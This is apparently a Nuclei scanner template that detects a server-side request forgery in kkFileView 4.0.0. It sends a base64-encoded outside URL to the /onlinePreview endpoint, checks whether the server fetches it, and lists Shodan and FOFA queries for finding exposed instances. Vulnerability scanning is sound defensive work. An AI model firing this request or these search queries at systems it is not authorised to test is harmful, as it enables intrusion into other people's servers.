id: kkfileview-ssrf

info:
  name: kkFileView 4.0.0 - Server-Side Request Forgery
  author: Arm!tage
  severity: high
  description: |
    kkFileView 4.0.0 is susceptible to server-side request forgery
  reference:
    - https://github.com/kekingcn/kkFileView/issues/296
  classification:
    cwe-id: CWE-918
    cpe: cpe:2.3:a:keking:kkfileview:*:*:*:*:*:*:*:*
  metadata:
    verified: true
    max-request: 1
    vendor: keking
    product: kkfileview
    shodan-query: http.html:"kkFileView"
    fofa-query: app="kkFileView"
  tags: ssrf,kkfileview

http:
  - method: GET
    path:
      - "{{BaseURL}}/onlinePreview?url={{base64('http://oast.fun/robots.txt')}}"

    extractors:
      - type: regex
        name: data
        group: 1
        regex:
          - 'hidden id="textData" value="([A-Za-z0-9=]+)"\/>'
        internal: true
    matchers:
      - type: dsl
        dsl:
          - contains(base64_decode(data), "Disallow")

# digest: 4a0a00473045022100fa4bc22bd8a6287ccda109cdc8373e4ab323a1b64df2541bb2b62e666ff5842a0220528f42df714332aa522045f204ab35c21a384fb90507f9e946c38ffa3e1b2fce:922c64590222798bb761d5b6d8e72950
